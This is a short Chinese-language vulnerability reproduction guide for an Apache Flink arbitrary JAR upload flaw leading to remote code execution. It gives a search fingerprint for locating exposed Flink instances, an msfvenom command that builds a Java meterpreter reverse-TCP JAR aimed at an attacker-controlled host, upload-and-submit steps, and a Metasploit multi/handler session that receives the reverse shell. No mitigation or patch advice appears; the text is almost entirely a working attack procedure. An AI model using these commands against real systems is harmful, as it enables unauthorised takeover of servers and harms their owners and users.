漏洞描述
近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞.
网络测绘
title="Apache-Flink"
漏洞复现
1.打开一个使用 Apache Flink 并且带有上传功能的网站
2.使用msf生成一个jar木马
msfvenom -p java/meterpreter/reverse_tcp LHOST=XXXX LPORT=4444 -f jar > test.jar
3.点击 Add 上传 jar 文件
4.msf开启端口监听
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload java/shell/reverse_tcp
payload => java/shell/reverse_tcp
msf6 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx
lhost => xxx.xxx.xxx.xxx
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
5.点击下 submit 成功反弹回shell